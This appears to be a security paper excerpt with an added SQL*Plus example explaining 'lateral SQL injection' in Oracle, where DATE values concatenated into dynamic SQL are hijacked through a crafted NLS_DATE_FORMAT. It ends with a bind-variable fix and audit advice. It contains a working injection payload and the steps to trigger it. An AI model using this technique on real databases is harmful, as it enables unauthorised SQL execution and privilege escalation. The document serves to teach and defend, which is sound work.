Lateral SQL Injection: A New Class of Vulnerability in Oracle
How can an attacker exploit a PL/SQL procedure that doesn't even take user input? Or how does one do SQL injection using DATE or even NUMBER data types? Until now this has not been thought possible, but as this paper will demonstrate, with a little bit of trickery it can be done in the Oracle RDBMS. Consider the following code for a PL/SQL procedure:
create or replace procedure date_proc is
  stmt varchar2(200);
  v_date date := sysdate;
begin
  -- v_date is implicitly converted to a string and concatenated into the SQL text
  stmt := 'select object_name from all_objects where created = ''' ||
          v_date || '''';
  dbms_output.put_line(stmt);
  execute immediate stmt;
end;
/
It takes no parameters and so typically would not be audited. That said, we can see that the V_DATE variable is embedded within an SQL query which is then dynamically executed via the EXECUTE IMMEDIATE statement. Tracing back through the code we see that the value of V_DATE is assigned from a call to the SYSDATE built-in function. If this value could somehow be influenced, an attacker could potentially inject arbitrary SQL. As we will see this is fully exploitable, but first let's consider this code:
create or replace procedure date_proc_2(p_date date) is
  stmt varchar2(200);
begin
  -- p_date is a DATE parameter, but it is still concatenated into the SQL text
  stmt := 'select object_name from all_objects where created = ''' ||
          p_date || '''';
  dbms_output.put_line(stmt);
  execute immediate stmt;
end;
/
The code here is similar to the code of the first procedure except this time the date is passed as a DATE type parameter. As DATE parameters are thought of as "safe", this procedure would probably not be audited either. If we try to perform a typical SQL injection attack here, it fails because the parameter is a DATE and not a VARCHAR2: the string payload is converted to a DATE before the procedure ever runs, and the conversion rejects it.
SQL> exec date_proc_2(''' and scott.getdba()=1--');
BEGIN date_proc_2(''' and scott.getdba()=1--'); END;
ERROR at line 1:
ORA-01841: (full) year must be between -4713 and +9999, and not be 0
ORA-06512: at line 1
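The following SQL*Plus script is an added example and not code from the paper. It shows why the implicit DATE-to-string conversion inside date_proc and date_proc_2 is under the caller's control, and a hardened rewrite that uses a bind variable instead of concatenation. It assumes a schema that can create procedures, and it reuses the scott.getdba() function name from the payload above purely as a marker; nothing here depends on that function's body.

```sql
-- Added example, not code from the paper. It demonstrates how the implicit
-- DATE-to-VARCHAR2 conversion in date_proc / date_proc_2 is influenced by the
-- session, and shows a hardened rewrite. scott.getdba() is the marker function
-- used by the paper's own payload and is assumed to exist.
set serveroutput on

-- Concatenating a DATE into a string converts it using the session parameter
-- NLS_DATE_FORMAT, which every user can change for their own session.
alter session set nls_date_format = 'DD-MON-YYYY';
select sysdate from dual;

-- Text enclosed in double quotes inside a format model is copied verbatim into
-- the output, so the string SYSDATE turns into is whatever we choose. The
-- doubled single quote is ordinary SQL escaping for one literal quote.
-- Format models have a length limit, so the payload must stay short.
alter session set nls_date_format = '"'' and scott.getdba()=1--"';
select sysdate from dual;
-- SYSDATE now renders as:   ' and scott.getdba()=1--

-- date_proc takes no arguments, yet the statement it prints and executes is now
--   select object_name from all_objects where created = '' and scott.getdba()=1--'
-- i.e. attacker-chosen SQL has been injected without passing a single parameter.
-- date_proc_2 is affected the same way because it concatenates p_date just like
-- date_proc concatenates v_date.
exec date_proc

-- Hardened form: the DATE travels as a bind variable and never becomes part of
-- the SQL text, so NLS_DATE_FORMAT no longer matters. p_date defaults to SYSDATE
-- so one procedure covers both the no-argument and the DATE-parameter cases.
create or replace procedure date_proc_safe(p_date date default sysdate) is
  stmt varchar2(200);
begin
  stmt := 'select object_name from all_objects where created = :d';
  dbms_output.put_line(stmt);
  execute immediate stmt using p_date;
end;
/

-- If a DATE really must be turned into text, convert it with an explicit format
-- model so the result has a fixed shape (digits and separators only):
--   '''' || to_char(p_date, 'YYYY-MM-DD HH24:MI:SS') || ''''
-- Finally, restore the session's usual date format.
alter session set nls_date_format = 'DD-MON-RR';
```

The hardened procedure keeps the same query and the same EXECUTE IMMEDIATE, only the DATE is supplied through USING; reviewing dynamic SQL for concatenated DATE and NUMBER values, not just VARCHAR2 ones, is the audit step this class of bug calls for.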